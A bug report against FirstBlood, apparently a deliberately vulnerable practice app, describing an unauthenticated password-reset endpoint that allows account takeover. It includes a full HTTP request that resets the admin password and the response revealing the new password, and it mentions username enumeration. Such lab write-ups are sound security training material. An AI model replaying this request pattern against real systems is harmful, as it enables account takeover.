FirstBlood-#519Account takeover via /drpanel/drapi/editpassword.php
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-26, 0x1452 Level 3 reported:

Hey!

Summary

The HTML source of /drpanel/index.php contains the following code in a comment:

 function editpassword(username) {
     var xhr = new XMLHttpRequest();
     xhr.open("POST", '', true);
     xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

     xhr.onreadystatechange = function() {
         if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
             alert(this.responseText);
             } else {

             }
         }

     xhr.send();
 }

I found that there's an endpoint called /drpanel/drapi/editpassword.php that lets you reset anyone's password. The user doesn't have to be logged in at all to do this.

To reproduce this simply send a POST request to /drpanel/drapi/editpassword.php with the body username=:username.

Taking over the admin account:

Note that there are no session cookies set!

POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: b6a5124dc2a4-0x1452.a.firstbloodhackers.com
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://b6a5124dc2a4-0x1452.a.firstbloodhackers.com/login.php?action=login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

username=drAdmin

Example response:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Oct 2021 02:11:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34

Password updated - RxJPi2qpNyjYQnc

The attacker can now log into the admin account drAdmin using the new password.

Impact

An attacker can take over any account they know the username of.

P1 CRITICAL

Endpoint: /drpanel/drapi/editpassword.php This bug makes use of the following vulnerabilities in a chain:

  • Auth issues
  • Auth issues


FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.

FirstBlood ID: 28
Vulnerability Type: Auth issues

The endpoint /drapi/editpassword can actually be accessed unauthenticated.